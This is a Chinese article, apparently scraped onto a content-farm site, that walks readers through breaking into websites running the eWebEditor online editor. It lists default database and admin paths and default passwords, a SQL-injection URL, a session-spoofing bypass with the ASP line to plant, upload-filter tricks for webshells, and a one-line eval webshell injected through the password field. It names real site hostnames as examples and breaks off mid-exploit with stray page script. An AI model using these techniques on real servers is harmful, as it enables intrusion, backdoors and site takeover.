欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

浅析Webedit在线编辑器的入侵

时间:2023-08-15 08:26:04 其他范文 收藏本文 下载本文

以下是小编精心整理的浅析Webedit在线编辑器的入侵,本文共6篇,供大家阅读参考。

浅析Webedit在线编辑器的入侵

篇1:浅析Webedit在线编辑器的入侵

ewebeditor编辑器可一般默认数据库路径是db/ewebeditor.mdb

默认的后台路径是admin/admin_login.asp

有的时候管理员修改为asp、asa,可以插入一句话

有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的后缀样式表,直接利用上传,具体看完文章我想大家都有个全新的认识了

还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的

例如:db/#ewebeditor.asa、db/#ewebeditor.asp

有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞

简单利用就是

site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

www.siqinci.com/ewebedito ... amp;style=full_v200

可以利用nbsi进行猜解,对此进行注入

还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的

这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:

文件上传

www.golden-victory.com/ewebeditor/upload.asp?action=save&type=image&style=s_poppop” method=post name=myform. enctype=“multipart/form-data”>

还有种方式是最近坏客发现的

利用WebEditor session欺骗漏洞,进入后台:

漏洞文件:Admin_Private.asp

漏洞语句:<%

If Session(“eWebEditor_User”) = “” Then

Response.Redirect “admin_login.asp”

Response.End

End If

只判断了session,没有判断cookies和路径的验证问题,

浅析Webedit在线编辑器的入侵

漏洞利用:

新建一个amxking.asp内容如下:

<%Session(“eWebEditor_User”) = “11111111”%>

访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp

篇2:脚本入侵 入侵ewebeditor编辑器一些技巧

脚本入侵 入侵ewebeditor编辑器一些技巧,使用ewebeditor的朋友可以参考下,

eWebEditor编辑器

建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理

默认后台地址:/ewebeditor/admin_login.asp

使用默认密码:admin/admin 或 admin/admin888

不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb

拿webshell方法第一种方法

登陆后台点击“样式管理”-选择新增样式

只写这几样 大家照做就行了

样式名称:chouxiaozi 随便写

路径模式:选择绝对路径

图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx

这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了

上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马

内容路径:空 记得

图片限制:写上1000 免的上不了我们的asp木马

然后我们就可以提交了

就可以看到样式增加成功!

然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏

然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置

在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击

然后上传我们的刚才添加的格式的木马

拿webshell方法第二种方法

登陆后台,点击修改密码---新密码设置为 1“:eval request(”choxiaozi“)’

设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.

然后用一句话客户端连接

拿webshell方法第三种方法

ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell

下载教程看

拿webshell方法第四种方法

利用ewebeditor asp版 2.1.6 上传漏洞利用程序

首先先看eWebEditor/upload.asp 上传地址存在不

存在的话就把下面的代码保存为

H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----

200){ console.log(111) $(".right_fix").attr("style","position: fixed; top: 10px;") }else{ $(".right_fix").attr("style","") } });